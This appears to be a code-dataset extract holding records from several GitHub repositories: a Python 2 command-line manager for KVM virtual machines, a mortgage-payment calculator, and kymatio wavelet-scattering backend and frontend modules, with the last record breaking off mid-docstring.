\nVirtualMachine.metadata.create_all(engine)\n\n\nclass CLI(cmd.Cmd):\n prompt = 'cugkvm>'\n vm = None\n \n def __init__(self, vm):\n cmd.Cmd.__init__(self)\n self.vm = vm\n self.prompt = 'cugmanager[%s]> ' % self.vm.name\n \n def help_help(self):\n pass\n \n def do_start(self, s):\n '''start\n Start the virtual machine (Power ON)\n '''\n self.vm.start()\n \n def do_stop(self, s):\n '''stop\n Gracefully shuts the virtual machine down\n '''\n self.vm.stop()\n \n def do_power(self, s):\n '''power\n Forcefully turns the virtual machine off (Pulling the power)\n '''\n self.vm.power()\n \n def do_restart(self, s):\n '''restart\n Reboots the virtual machine gracefully\n '''\n self.vm.restart()\n \n def do_delete(self, s):\n '''delete\n Forcefully powers the virtual machine down and deletes the \n configuration and disk.\n '''\n print 'WARNING: This will permanently erase the VM!'\n if raw_input('Continue? [yes/NO]: ').lower() == 'yes':\n print 'Deleting VM...'\n self.vm.delete()\n else:\n print 'Aborting deletion...'\n \n def do_create(self, iso):\n '''create ISO_IMAGE\n Will create a new virtual machine with the ISO specified if there is\n currently no VM definition set.\n '''\n if iso in self._get_isos():\n s = Session()\n self.vm.create(iso)\n s.merge(self.vm)\n s.commit()\n print 'Networking Information\\n----------------------'\n print 'IP Address: %s' % self.vm.address\n print ' Netmask: %s' % self.vm.netmask\n print ' Gateway: %s' % self.vm.router\n print 'Nameserver: 4.2.2.2\\n'\n self.do_console('')\n else:\n print '%s is not a valid ISO Image.' % s\n \n def do_status(self, s):\n '''status\n Returns the current running status of the virtual machine.\n '''\n print self.vm.status()\n \n def do_console(self, s):\n '''console\n Controls access to the VNC Console session\n \n OPTIONS:\n \n enable Opens the console port & returns the connection\n information\n \n disable Closes the console port.\n \n <default> Returns the connection information.\n '''\n d = {True: 'Success', False: 'Failed'}\n if self.vm.status() == 'running':\n if s.lower() == 'enable':\n print d[self.vm.enable_console()]\n if s.lower() == 'disable':\n print d[self.vm.disable_console()]\n else:\n print 'VNC Port: %s\\nPassword: %s' % (self.vm.console(), \n self.vm.passwd)\n #print 'VNC Port: %s' % self.vm.console()\n else:\n print 'VM not running, please start the VM first.'\n \n def _get_isos(self):\n return os.listdir(config.get('Settings', 'iso_path'))\n \n def complete_create(self, text, line, begidx, endidx):\n if not text:\n return self._get_isos()\n else:\n return [s for s in self._get_isos() if s.startswith(text)]\n \n def do_exit(self, s):\n '''exit\n Exits cugmanager\n '''\n return True\n \n def do_updatepw(self, s):\n '''updatepw\n Updates the virtual machines\\' login password. '''\n s = Session()\n opw = getpass.getpass('Current Password: ')\n if self.vm.check_password(opw):\n pw1 = getpass.getpass('New Password: ')\n pw2 = getpass.getpass('Confirm Password: ')\n if pw1 == pw2:\n self.vm.update_password(pw1)\n s.merge(self.vm)\n s.commit()\n print 'Password Updated.'\n else:\n print 'Password Mismatch.'\n else:\n print 'Old Password doesnt match whats on file.'\n s.close()\n\ndef login():\n #os.chdir(os.path.dirname(__file__))\n os.system('clear')\n count = 0\n s = Session()\n print 'CUGManager Login'\n while count < 3:\n name = raw_input('VM Name: ').strip()\n passwd = getpass.getpass()\n #try:\n vm = s.query(VirtualMachine).filter_by(name=name).one()\n if vm.check_password(passwd):\n CLI(vm).cmdloop()\n s.close()\n return True\n #except:\n # pass\n count += 1\n print 'Invalid Password or VM name.\\n'\n\nif __name__ == '__main__':\n login()"
},
{
"alpha_fraction": 0.7657142877578735,
"alphanum_fraction": 0.7657142877578735,
"avg_line_length": 34,
"blob_id": "964e17005121ed7d6acaa8c274553181f6b58d8a",
"content_id": "f7cb1f2ab1b61a315dbfdee1e3e1a44f67695102",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 350,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 10,
"path": "/README.md",
"repo_name": "SteveMcGrath/cugmanager",
"src_encoding": "UTF-8",
"text": "### Under active Development\n\n#### TODO:\n\n* Develop Website to supplant the CLI app\n* Build new CLI app that will talk to Web API\n* Replace shell commands where possible with native python calls\n* Add capability to run over DHCP (removes need for providing IP info)\n* Flesh out admin.py to provide more functionality\n* Add error checking to admin.py\n"
}
] | 3 |
danielgmason/multiple-mortgages-calculator
|
https://github.com/danielgmason/multiple-mortgages-calculator
|
3a4749bcc1e1884d5a4b33339f747e4895e79639
|
f1dff462258a81aa7d917e8c3b4cc5565d74525d
|
853f53f51cc65f35d0c17ab34edfe11ece410b8a
|
refs/heads/master
| 2021-01-20T19:36:32.622979 | 2016-07-26T22:29:01 | 2016-07-26T22:29:01 | 64,258,932 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6703507900238037,
"alphanum_fraction": 0.7011052370071411,
"avg_line_length": 31.271318435668945,
"blob_id": "43b7efa7246d6cab0e235b31b440a4d9b2bf0cfc",
"content_id": "7246cb9a6826fd31faca64eb9323f3cf384ede97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4162,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 129,
"path": "/simple.py",
"repo_name": "danielgmason/multiple-mortgages-calculator",
"src_encoding": "UTF-8",
"text": "''' mortgage_loan_calc1.py\ncalculate the monthly payment on a mortgage loan\ntested with Python27 and Python33\n'''\nimport math\ndef calc_mortgage_bank(bank_principal, bank_interest, bank_years):\n '''\n given mortgage loan principal, interest(%) and years to pay\n calculate and return monthly payment amount\n '''\n # monthly rate from annual percentage rate\n interest_rate_calc_bank = bank_interest/(100 * 12)\n # total number of payments\n payment_num_bank_calc = bank_years * 12\n # calculate monthly payment\n monthly_bank_payment = bank_principal * \\\n (interest_rate_calc_bank / (1-math.pow((1+interest_rate_calc_bank), (-payment_num_bank_calc))))\n return monthly_bank_payment\n\n\ndef calc_mortgage_family(family_principal, family_interest, family_years):\n '''\n this calculates the second part of the mortgage, that's provided outside\n of the bank loan\n '''\n # monthly rate form annual percentage rate\n interest_rate_family = family_interest/(100*12)\n # total number of payments\n payment_num_family = family_years * 12\n # calcullate monthly payments\n payment_family = family_principal * \\\n (interest_rate_family/(1-math.pow((1+interest_rate_family), (-payment_num_family))))\n return payment_family\n\n\n## EDITABLE INFORMATION\n# down payment\npurchase_price = 399000\ndown_payment = 100000\nmonthly_hoas = 610\nannual_taxes = 4915\nbank_mortgage_total = 100000\nmonthly_insurance = 80\n\n## BANK MORTAGE INFORMATION\n# bank mortgage amount\nbank_principal = bank_mortgage_total\n#bank annual interest\nbank_interest = 3.4\n# years to pay off mortgage\nbank_years = 30\n\n## FAMILY MORTAGE INFORMATION\n# family mortgage amount\nfamily_principal = purchase_price - down_payment - bank_principal\n#family annual interest\nfamily_interest = 2.0\n# years to pay off mortgage\nfamily_years = 30\n\n\n# calculate monthly payment amount frp, baml\nmonthly_payment_bank = calc_mortgage_bank(bank_principal, bank_interest, bank_years)\n\n# calculate monthly payment amount\nmonthly_payment_family = calc_mortgage_family(family_principal, family_interest, family_years)\n\n# combine the two mortages\n\n\ntotal_monthly_mortgage_amount = int(monthly_payment_bank) + int(monthly_payment_family)\n\ntotal_monthly_cost = total_monthly_mortgage_amount + monthly_hoas + (annual_taxes/12) + monthly_insurance\n# calculate total amount paid\ntotal_mortgage_amount = int(monthly_payment_bank * bank_years * 12) + int(monthly_payment_family * family_years * 12)\n\ntotal_30_year_costs = total_mortgage_amount + (annual_taxes*bank_years) + (monthly_hoas * 12 * bank_years) + (monthly_insurance * 12 * bank_years)\n# show result ...\n# {:,} uses the comma as a thousands separator\nprint('-'*40)\nprint 'START:::'\nprint('-'*40)\nprint 'BANK PORTION:'\nsf = '''\\\nFor a {} year mortgage loan of ${:,}\nat an annual interest rate of {:.2f}%\nyou pay ${:.2f} monthly'''\nprint(sf.format(bank_years, bank_principal, bank_interest, monthly_payment_bank))\nprint('-'*40)\nprint '2nd MORTGAGE PORTION:'\nsf = '''\\\nFor a {} year mortgage loan of ${:,}\nat an annual interest rate of {:.2f}%\nyou pay ${:.2f} monthly'''\nprint(sf.format(family_years, family_principal, family_interest, monthly_payment_family))\nprint('-'*40)\nprint 'TOTAL:'\nsf = '''\\\nThe Total Monthly Mortgage Payment is ${:,.2f}'''\nprint (sf.format(total_monthly_mortgage_amount))\nprint('-'*40)\nprint 'ADDITIONAL MONTHLY COSTS:'\nsf = '''\\\nMonthly HOAs : ${:,.2f}'''\nprint (sf.format(monthly_hoas))\nsf = '''\\\nMonthly Taxes : ${:,.2f}'''\nprint (sf.format(annual_taxes/12))\nsf = '''\\\nMonthly Insurance : ${:,.2f}'''\nprint (sf.format(monthly_insurance))\nprint('-'*40)\nprint 'TOTAL ALL-IN MONTHLY COSTS:'\nsf = '''\\\nTotal costs are : ${:,.2f}'''\nprint (sf.format(total_monthly_cost))\nprint('-'*40)\nprint 'LIFETIME OF MORTAGE (30 Years):'\nprint(\"Total mortgage paid will be ${:,.2f}\".format(total_mortgage_amount))\nprint(\"Total all-in costs (at current levels) will be : ${:,.2f}\".format(total_30_year_costs))\nprint('-'*40)\n\n''' result ...\nFor a 30 year mortgage loan of $100,000\nat an annual interest rate of 7.50%\nyou pay $699.21 monthly\n----------------------------------------\nTotal amount paid will be $251,717.22\n'''"
}
] | 1 |
changhongw/kymatio
|
https://github.com/changhongw/kymatio
|
9d846c302fa52264ebaa866b0ffa6e62824a4631
|
30b11751b1731b803ac0756da744b163a32d67b2
|
71a50b7a3ef1febe30560890fbf25282f003cb09
|
refs/heads/master
| 2022-10-26T01:10:34.524857 | 2022-06-02T07:31:22 | 2022-06-02T07:31:22 | 208,447,138 | 0 | 0 |
BSD-3-Clause
| 2019-09-14T13:51:37 | 2019-09-14T13:51:38 | 2022-04-20T16:41:09 | null |
[
{
"alpha_fraction": 0.5688073635101318,
"alphanum_fraction": 0.5753604173660278,
"avg_line_length": 24.433332443237305,
"blob_id": "504ee5175a5c6a620d6ea32e5982fdb4073b5474",
"content_id": "7028e1bcd737ca546feedfad91ab9943f9a813f0",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2289,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 90,
"path": "/kymatio/backend/tensorflow_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nimport numpy as np\n\n\n\ndef _is_complex(x):\n return (x.dtype == np.complex64) or (x.dtype == np.complex128)\n\n\ndef _is_real(x):\n return (x.dtype == np.float32) or (x.dtype == np.float64)\n\n\nclass Modulus():\n \"\"\"This class implements a modulus transform for complex numbers.\n\n Parameters\n ----------\n x: input complex tensor.\n\n Returns\n ----------\n output: a complex tensor equal to the modulus of x.\n\n Usage\n ----------\n modulus = Modulus()\n x_mod = modulus(x)\n \"\"\"\n def __call__(self, x):\n norm = tf.abs(x)\n return tf.cast(norm, tf.complex64)\n\n\ndef real(x):\n \"\"\"Real part of complex tensor\n Takes the real part of a complex tensor, where the last axis corresponds\n to the real and imaginary parts.\n Parameters\n ----------\n x : tensor\n A complex tensor (that is, whose last dimension is equal to 2).\n Returns\n -------\n x_real : tensor\n The tensor x[..., 0] which is interpreted as the real part of x.\n \"\"\"\n return tf.math.real(x)\n\n\ndef concatenate(arrays, dim):\n return tf.stack(arrays, axis=dim)\n\n\ndef cdgmm(A, B, inplace=False):\n \"\"\"\n Complex pointwise multiplication between (batched) tensor A and tensor B.\n Parameters\n ----------\n A : tensor\n A is a complex tensor of size (B, C, M, N, 2)\n B : tensor\n B is a complex tensor of size (M, N) or real tensor of (M, N)\n inplace : boolean, optional\n if set to True, all the operations are performed inplace\n Returns\n -------\n C : tensor\n output tensor of size (B, C, M, N, 2) such that:\n C[b, c, m, n, :] = A[b, c, m, n, :] * B[m, n, :]\n \"\"\"\n\n if not _is_complex(A):\n raise TypeError('The first input must be complex.')\n\n if A.shape[-len(B.shape):] != B.shape[:]:\n raise RuntimeError('The inputs are not compatible for multiplication.')\n\n if not _is_complex(B) and not _is_real(B):\n raise TypeError('The second input must be complex or real.')\n\n return A * B\n\n\ndef sanity_check(x):\n if not _is_complex(x):\n raise TypeError('The input should be complex.')\n\n if not x.is_contiguous():\n raise RuntimeError('Tensors must be contiguous.')\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.7840909361839294,
"avg_line_length": 40.06666564941406,
"blob_id": "3c739acb8a628aee9d756d5ac7f616c0f8812f99",
"content_id": "c64a60bdfb7fd81273089f7de93164d4807452ba",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 616,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 15,
"path": "/kymatio/numpy.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from .scattering1d.frontend.numpy_frontend import ScatteringNumPy1D as Scattering1D\nfrom .scattering2d.frontend.numpy_frontend import ScatteringNumPy2D as Scattering2D\nfrom .scattering3d.frontend.numpy_frontend \\\n import HarmonicScatteringNumPy3D as HarmonicScattering3D\n\nScattering1D.__module__ = 'kymatio.numpy'\nScattering1D.__name__ = 'Scattering1D'\n\nScattering2D.__module__ = 'kymatio.numpy'\nScattering2D.__name__ = 'Scattering2D'\n\nHarmonicScattering3D.__module__ = 'kymatio.numpy'\nHarmonicScattering3D.__name__ = 'HarmonicScattering3D'\n\n__all__ = ['Scattering1D', 'Scattering2D', 'HarmonicScattering3D']\n"
},
{
"alpha_fraction": 0.5598759651184082,
"alphanum_fraction": 0.5682252049446106,
"avg_line_length": 32.269840240478516,
"blob_id": "c3cc006e289e47c4047083c765d28b288483885b",
"content_id": "bbac52b6d331c100dc6afd84598ae89d0ca84d2f",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4192,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 126,
"path": "/kymatio/scattering2d/frontend/torch_frontend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import torch\n\nfrom .base_frontend import ScatteringBase2D\nfrom ...scattering2d.core.scattering2d import scattering2d\nfrom ...frontend.torch_frontend import ScatteringTorch\n\n\nclass ScatteringTorch2D(ScatteringTorch, ScatteringBase2D):\n def __init__(self, J, shape, L=8, max_order=2, pre_pad=False,\n backend='torch', out_type='array'):\n ScatteringTorch.__init__(self)\n ScatteringBase2D.__init__(**locals())\n ScatteringBase2D._instantiate_backend(self, 'kymatio.scattering2d.backend.')\n ScatteringBase2D.build(self)\n ScatteringBase2D.create_filters(self)\n\n if pre_pad:\n # Need to cast to complex in Torch\n self.pad = lambda x: x.reshape(x.shape + (1,))\n\n self.register_filters()\n\n def register_single_filter(self, v, n):\n current_filter = torch.from_numpy(v).unsqueeze(-1)\n self.register_buffer('tensor' + str(n), current_filter)\n return current_filter\n\n def register_filters(self):\n \"\"\" This function run the filterbank function that\n will create the filters as numpy array, and then, it\n saves those arrays as module's buffers.\"\"\"\n # Create the filters\n\n n = 0\n\n for c, phi in self.phi.items():\n if not isinstance(c, int):\n continue\n\n self.phi[c] = self.register_single_filter(phi, n)\n n = n + 1\n\n for j in range(len(self.psi)):\n for k, v in self.psi[j].items():\n if not isinstance(k, int):\n continue\n\n self.psi[j][k] = self.register_single_filter(v, n)\n n = n + 1\n\n def load_single_filter(self, n, buffer_dict):\n return buffer_dict['tensor' + str(n)]\n\n def load_filters(self):\n \"\"\" This function loads filters from the module's buffers \"\"\"\n # each time scattering is run, one needs to make sure self.psi and self.phi point to\n # the correct buffers\n buffer_dict = dict(self.named_buffers())\n\n n = 0\n\n phis = self.phi\n for c, phi in phis.items():\n if not isinstance(c, int):\n continue\n\n phis[c] = self.load_single_filter(n, buffer_dict)\n n = n + 1\n\n psis = self.psi\n for j in range(len(psis)):\n for k, v in psis[j].items():\n if not isinstance(k, int):\n continue\n\n psis[j][k] = self.load_single_filter(n, buffer_dict)\n n = n + 1\n\n return phis, psis\n\n def scattering(self, input):\n if not torch.is_tensor(input):\n raise TypeError('The input should be a PyTorch Tensor.')\n\n if len(input.shape) < 2:\n raise RuntimeError('Input tensor must have at least two dimensions.')\n\n if not input.is_contiguous():\n raise RuntimeError('Tensor must be contiguous.')\n\n if (input.shape[-1] != self.N or input.shape[-2] != self.M) and not self.pre_pad:\n raise RuntimeError('Tensor must be of spatial size (%i,%i).' % (self.M, self.N))\n\n if (input.shape[-1] != self.N_padded or input.shape[-2] != self.M_padded) and self.pre_pad:\n raise RuntimeError('Padded tensor must be of spatial size (%i,%i).' % (self.M_padded, self.N_padded))\n\n if not self.out_type in ('array', 'list'):\n raise RuntimeError(\"The out_type must be one of 'array' or 'list'.\")\n\n phi, psi = self.load_filters()\n\n batch_shape = input.shape[:-2]\n signal_shape = input.shape[-2:]\n\n input = input.reshape((-1,) + signal_shape)\n\n S = scattering2d(input, self.pad, self.unpad, self.backend, self.J,\n self.L, phi, psi, self.max_order, self.out_type)\n\n if self.out_type == 'array':\n scattering_shape = S.shape[-3:]\n S = S.reshape(batch_shape + scattering_shape)\n else:\n scattering_shape = S[0]['coef'].shape[-2:]\n new_shape = batch_shape + scattering_shape\n\n for x in S:\n x['coef'] = x['coef'].reshape(new_shape)\n\n return S\n\n\nScatteringTorch2D._document()\n\n\n__all__ = ['ScatteringTorch2D']\n"
},
{
"alpha_fraction": 0.5584185719490051,
"alphanum_fraction": 0.5712037682533264,
"avg_line_length": 26.481081008911133,
"blob_id": "39098e1f44fecb4fad421d13187c052478e9a89f",
"content_id": "96b2edcf21a571e01abcf3428dc215aac50af0cc",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5084,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 185,
"path": "/kymatio/scattering3d/backend/tensorflow_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\n\nimport numpy as np\n\nfrom collections import namedtuple\n\n\nBACKEND_NAME = 'tensorflow'\n\n\ndef complex_modulus(x):\n \"\"\"Computes complex modulus.\n\n Parameters\n ----------\n x : tensor\n Input tensor whose complex modulus is to be calculated.\n\n Returns\n -------\n modulus : tensor\n Tensor the same size as input_array. modulus holds the\n result of the complex modulus.\n\n \"\"\"\n modulus = tf.abs(x)\n return modulus\n\n\ndef modulus_rotation(x, module):\n \"\"\"Used for computing rotation invariant scattering transform coefficents.\n\n Parameters\n ----------\n x : tensor\n Size (batchsize, M, N, O).\n module : tensor\n Tensor that holds the overall sum.\n\n Returns\n -------\n output : tensor\n Tensor of the same size as input_array. It holds the output of\n the operation::\n\n $\\\\sqrt{\\\\sum_m (\\\\text{input}_\\\\text{array} \\\\star \\\\psi_{j,l,m})^2)}$\n\n which is covariant to 3D translations and rotations.\n\n \"\"\"\n if module is None:\n module = tf.zeros_like(x, tf.float32)\n else:\n module = module ** 2\n module += tf.abs(x) ** 2\n return tf.sqrt(module)\n\n\ndef compute_integrals(input_array, integral_powers):\n \"\"\"Computes integrals.\n\n Computes integrals of the input_array to the given powers.\n\n Parameters\n ----------\n input_array : tensor\n Size (B, M, N, O), where B is batch_size, and M, N, O are spatial\n dims.\n integral_powers : list\n List of P positive floats containing the p values used to\n compute the integrals of the input_array to the power p (l_p\n norms).\n\n Returns\n -------\n integrals : tensor\n Tensor of size (B, P) containing the integrals of the input_array\n to the powers p (l_p norms).\n\n \"\"\"\n integrals = []\n for i_q, q in enumerate(integral_powers):\n integrals.append(tf.reduce_sum(tf.reshape(tf.pow(input_array, q), shape=(input_array.shape[0], -1)), axis=1))\n return tf.stack(integrals, axis=-1)\n\n\ndef fft(x, direction='C2C', inverse=False):\n \"\"\"FFT of a 3d signal.\n\n Example\n -------\n real = tf.random.uniform(128, 32, 32, 32)\n imag = tf.random.uniform(128, 32, 32, 32)\n\n x = tf.complex(real, imag)\n\n x_fft = fft(x)\n x_ifft = fft(x, inverse=True)\n\n x = fft(x_fft, inverse=True)\n x = fft(x_ifft, inverse=False)\n\n Parameters\n ----------\n input : tensor\n Complex input for the FFT.\n direction : string\n 'C2R' for complex to real, 'C2C' for complex to complex.\n inverse : bool\n True for computing the inverse FFT.\n NB : If direction is equal to 'C2R', then an error is raised.\n\n Raises\n ------\n RuntimeError\n Raised in event we attempt to map from complex to real without\n inverse FFT.\n\n Returns\n -------\n output : tensor\n Result of FFT or IFFT.\n\n \"\"\"\n if direction == 'C2R':\n if not inverse:\n raise RuntimeError('C2R mode can only be done with an inverse FFT')\n\n x = tf.cast(x, tf.complex64)\n\n if direction == 'C2R':\n output = tf.math.real(tf.signal.ifft3d(x, name='irfft3d'))\n elif direction == 'C2C':\n if inverse:\n output = tf.signal.ifft3d(x, name='ifft3d')\n else:\n output = tf.signal.fft3d(x, name='fft3d')\n return tf.cast(output, tf.complex64)\n\n\ndef cdgmm3d(A, B, inplace=False):\n \"\"\"Complex pointwise multiplication.\n\n Complex pointwise multiplication between (batched) tensor A and tensor B.\n\n Parameters\n ----------\n A : tensor\n Complex tensor.\n B : tensor\n Complex tensor of the same size as A.\n inplace : boolean, optional\n If set True, all the operations are performed inplace.\n\n Returns\n -------\n output : tensor\n Tensor of the same size as A containing the result of the elementwise\n complex multiplication of A with B.\n\n \"\"\"\n if B.ndim != 3:\n raise RuntimeError('The dimension of the second input must be 3.')\n\n Cr = tf.cast(tf.math.real(A) * np.real(B) - tf.math.imag(A) * np.imag(B), tf.complex64)\n Ci = tf.cast(tf.math.real(A) * np.imag(B) + tf.math.imag(A) * np.real(B), tf.complex64)\n\n return Cr + 1.0j * Ci\n\n\ndef concatenate(arrays, L):\n S = tf.stack(arrays, axis=1)\n S = tf.reshape(S, tuple((S.shape[0], S.shape[1] // (L + 1), (L + 1))) + tuple(S.shape[2:]))\n return S\n\n\nbackend = namedtuple('backend', ['name', 'cdgmm3d', 'fft', 'modulus', 'modulus_rotation', 'compute_integrals'])\n\nbackend.name = 'tensorflow'\nbackend.cdgmm3d = cdgmm3d\nbackend.fft = fft\nbackend.modulus = complex_modulus\nbackend.modulus_rotation = modulus_rotation\nbackend.compute_integrals = compute_integrals\nbackend.concatenate = concatenate\n"
},
{
"alpha_fraction": 0.6025047898292542,
"alphanum_fraction": 0.6081806421279907,
"avg_line_length": 42.690025329589844,
"blob_id": "ef1364c8ecf32fa3342e19d1c24fc57e93bfd2b7",
"content_id": "eacc24d342f390c8a5e06a796d3981117a55ec6c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16209,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 371,
"path": "/kymatio/scattering1d/frontend/base_frontend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from ...frontend.base_frontend import ScatteringBase\nimport math\nimport numbers\n\nimport numpy as np\n\nfrom ..filter_bank import scattering_filter_factory\nfrom ..utils import (compute_border_indices, compute_padding, compute_minimum_support_to_pad,\ncompute_meta_scattering, precompute_size_scattering)\n\n\nclass ScatteringBase1D(ScatteringBase):\n def __init__(self, J, shape, Q=1, max_order=2, average=True,\n oversampling=0, vectorize=True, out_type='array', backend=None):\n super(ScatteringBase1D, self).__init__()\n self.J = J\n self.shape = shape\n self.Q = Q\n self.max_order = max_order\n self.average = average\n self.oversampling = oversampling\n self.vectorize = vectorize\n self.out_type = out_type\n self.backend = backend\n\n def build(self):\n \"\"\"Set up padding and filters\n\n Certain internal data, such as the amount of padding and the wavelet\n filters to be used in the scattering transform, need to be computed\n from the parameters given during construction. This function is called\n automatically during object creation and no subsequent calls are\n therefore needed.\n \"\"\"\n self.r_psi = math.sqrt(0.5)\n self.sigma0 = 0.1\n self.alpha = 5.\n self.P_max = 5\n self.eps = 1e-7\n self.criterion_amplitude = 1e-3\n self.normalize = 'l1'\n\n # check the shape\n if isinstance(self.shape, numbers.Integral):\n self.T = self.shape\n elif isinstance(self.shape, tuple):\n self.T = self.shape[0]\n if len(self.shape) > 1:\n raise ValueError(\"If shape is specified as a tuple, it must \"\n \"have exactly one element\")\n else:\n raise ValueError(\"shape must be an integer or a 1-tuple\")\n\n # Compute the minimum support to pad (ideally)\n min_to_pad = compute_minimum_support_to_pad(\n self.T, self.J, self.Q, r_psi=self.r_psi, sigma0=self.sigma0,\n alpha=self.alpha, P_max=self.P_max, eps=self.eps,\n criterion_amplitude=self.criterion_amplitude,\n normalize=self.normalize)\n # to avoid padding more than T - 1 on the left and on the right,\n # since otherwise torch sends nans\n J_max_support = int(np.floor(np.log2(3 * self.T - 2)))\n self.J_pad = min(int(np.ceil(np.log2(self.T + 2 * min_to_pad))),\n J_max_support)\n # compute the padding quantities:\n self.pad_left, self.pad_right = compute_padding(self.J_pad, self.T)\n # compute start and end indices\n self.ind_start, self.ind_end = compute_border_indices(\n self.J, self.pad_left, self.pad_left + self.T)\n\n def create_filters(self):\n # Create the filters\n self.phi_f, self.psi1_f, self.psi2_f, _ = scattering_filter_factory(\n self.J_pad, self.J, self.Q, normalize=self.normalize,\n criterion_amplitude=self.criterion_amplitude,\n r_psi=self.r_psi, sigma0=self.sigma0, alpha=self.alpha,\n P_max=self.P_max, eps=self.eps)\n\n def meta(self):\n \"\"\"Get meta information on the transform\n\n Calls the static method `compute_meta_scattering()` with the\n parameters of the transform object.\n\n Returns\n ------\n meta : dictionary\n See the documentation for `compute_meta_scattering()`.\n \"\"\"\n return compute_meta_scattering(self.J, self.Q, max_order=self.max_order)\n\n def output_size(self, detail=False):\n \"\"\"Get size of the scattering transform\n\n Calls the static method `precompute_size_scattering()` with the\n parameters of the transform object.\n\n Parameters\n ----------\n detail : boolean, optional\n Specifies whether to provide a detailed size (number of coefficient\n per order) or an aggregate size (total number of coefficients).\n\n Returns\n ------\n size : int or tuple\n See the documentation for `precompute_size_scattering()`.\n \"\"\"\n\n return precompute_size_scattering(\n self.J, self.Q, max_order=self.max_order, detail=detail)\n\n _doc_shape = 'T'\n\n _doc_instantiation_shape = {True: 'S = Scattering1D(J, T, Q)',\n False: 'S = Scattering1D(J, Q)'}\n\n _doc_param_shape = \\\n r\"\"\"shape : int\n The length of the input signals.\n \"\"\"\n\n _doc_attrs_shape = \\\n r\"\"\"J_pad : int\n The logarithm of the padded length of the signals.\n pad_left : int\n The amount of padding to the left of the signal.\n pad_right : int\n The amount of padding to the right of the signal.\n phi_f : dictionary\n A dictionary containing the lowpass filter at all resolutions. See\n `filter_bank.scattering_filter_factory` for an exact description.\n psi1_f : dictionary\n A dictionary containing all the first-order wavelet filters, each\n represented as a dictionary containing that filter at all\n resolutions. See `filter_bank.scattering_filter_factory` for an\n exact description.\n psi2_f : dictionary\n A dictionary containing all the second-order wavelet filters, each\n represented as a dictionary containing that filter at all\n resolutions. See `filter_bank.scattering_filter_factory` for an\n exact description.\n \"\"\"\n\n _doc_param_average = \\\n r\"\"\"average : boolean, optional\n Determines whether the output is averaged in time or not. The\n averaged output corresponds to the standard scattering transform,\n while the un-averaged output skips the last convolution by\n :math:`\\phi_J(t)`. This parameter may be modified after object\n creation. Defaults to `True`.\n \"\"\"\n\n _doc_attr_average = \\\n r\"\"\"average : boolean\n Controls whether the output should be averaged (the standard\n scattering transform) or not (resulting in wavelet modulus\n coefficients). Note that to obtain unaveraged output, the\n `vectorize` flag must be set to `False` or `out_type` must be set\n to `'list'`.\n \"\"\"\n\n _doc_param_vectorize = \\\n r\"\"\"vectorize : boolean, optional\n Determines wheter to return a vectorized scattering transform\n (that is, a large array containing the output) or a dictionary\n (where each entry corresponds to a separate scattering\n coefficient). This parameter may be modified after object\n creation. Deprecated in favor of `out_type` (see below). Defaults\n to True.\n out_type : str, optional\n The format of the output of a scattering transform. If set to\n `'list'`, then the output is a list containing each individual\n scattering coefficient with meta information. Otherwise, if set to\n `'array'`, the output is a large array containing the\n concatenation of all scattering coefficients. Defaults to\n `'array'`.\n \"\"\"\n\n _doc_attr_vectorize = \\\n r\"\"\"vectorize : boolean\n Controls whether the output should be vectorized into a single\n Tensor or collected into a dictionary. Deprecated in favor of\n `out_type`. For more details, see the documentation for\n `scattering`.\n out_type : str\n Specifices the output format of the transform, which is currently\n one of `'array'` or `'list`'. If `'array'`, the output is a large\n array containing the scattering coefficients. If `'list`', the\n output is a list of dictionaries, each containing a scattering\n coefficient along with meta information. For more information, see\n the documentation for `scattering`.\n \"\"\"\n\n _doc_class = \\\n r\"\"\"The 1D scattering transform\n\n The scattering transform computes a cascade of wavelet transforms\n alternated with a complex modulus non-linearity. The scattering\n transform of a 1D signal :math:`x(t)` may be written as\n\n $S_J x = [S_J^{{(0)}} x, S_J^{{(1)}} x, S_J^{{(2)}} x]$\n\n where\n\n $S_J^{{(0)}} x(t) = x \\star \\phi_J(t)$,\n\n $S_J^{{(1)}} x(t, \\lambda) = |x \\star \\psi_\\lambda^{{(1)}}| \\star \\phi_J$, and\n\n $S_J^{{(2)}} x(t, \\lambda, \\mu) = |\\,| x \\star \\psi_\\lambda^{{(1)}}| \\star \\psi_\\mu^{{(2)}} | \\star \\phi_J$.\n\n In the above formulas, :math:`\\star` denotes convolution in time. The\n filters $\\psi_\\lambda^{{(1)}}(t)$ and $\\psi_\\mu^{{(2)}}(t)$ are analytic\n wavelets with center frequencies $\\lambda$ and $\\mu$, while\n $\\phi_J(t)$ is a real lowpass filter centered at the zero frequency.\n\n The `Scattering1D` class implements the 1D scattering transform for a\n given set of filters whose parameters are specified at initialization.\n While the wavelets are fixed, other parameters may be changed after\n the object is created, such as whether to compute all of\n :math:`S_J^{{(0)}} x`, $S_J^{{(1)}} x$, and $S_J^{{(2)}} x$ or just\n $S_J^{{(0)}} x$ and $S_J^{{(1)}} x$.\n {frontend_paragraph}\n Given an input `{array}` `x` of shape `(B, T)`, where `B` is 